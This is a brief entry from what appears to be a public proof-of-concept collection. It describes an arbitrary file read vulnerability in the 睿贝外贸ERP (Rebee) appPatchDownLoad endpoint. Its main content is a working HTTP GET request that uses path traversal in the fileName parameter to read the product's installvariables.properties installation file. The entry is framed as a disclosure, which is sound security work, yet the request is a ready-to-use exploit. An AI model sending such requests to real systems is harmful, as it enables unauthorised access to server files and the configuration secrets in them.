睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞

2024-04-30 睿贝外贸ERP PoC Public

Description

睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞

PoC

GET /appPatchDownLoad?fileName=../../../../RebeeCRM/_RebeeCRM_installation/installvariables.properties HTTP/1.1
Host:

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities